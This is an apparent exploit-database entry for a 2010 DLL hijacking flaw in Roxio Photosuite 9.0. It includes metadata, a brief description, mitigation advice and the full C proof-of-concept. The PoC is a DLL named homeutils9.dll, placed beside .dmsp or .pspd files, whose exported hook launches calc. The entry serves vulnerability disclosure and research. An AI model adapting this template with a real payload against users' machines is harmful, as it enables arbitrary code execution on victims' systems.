header-logo
Suggest Exploit
vendor:
Photosuite
by:
Beenu Arora
7,8
CVSS
HIGH
DLL Hijacking
427
CWE
Product Name: Photosuite
Affected Version From: 9.0
Affected Version To: 9.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:roxio:photosuite:9.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

Roxio photosuite 9 DLL Hijacking Exploit

A DLL hijacking vulnerability exists in Roxio Photosuite 9.0 which allows an attacker to execute arbitrary code on the vulnerable system. An attacker can create a malicious DLL file and rename it to homeutils9.dll and place it in the same directory as one of the vulnerable extensions (.dmsp or .pspd). When the vulnerable application is launched, the malicious DLL will be executed.

Mitigation:

Ensure that all applications are up to date and patched with the latest security updates. Additionally, users should be aware of the potential risks of DLL hijacking and should avoid downloading and running untrusted applications.
Source

Exploit-DB raw data:

/*
# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles, Dinesh Arora

Exploit Title:  Roxio photosuite 9 DLL Hijacking Exploit
Date: 25/08/2010
Author: Beenu Arora
Tested on: Windows XP SP3 , Photosuite 9.0
Vulnerable extensions: .dmsp , .pspd

Compile and rename to homeutils9.dll, create a file in the same dir with one
of the following extensions:
.dmsp , .pspd
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

Navigation

Suggest Exploit

Services By CQR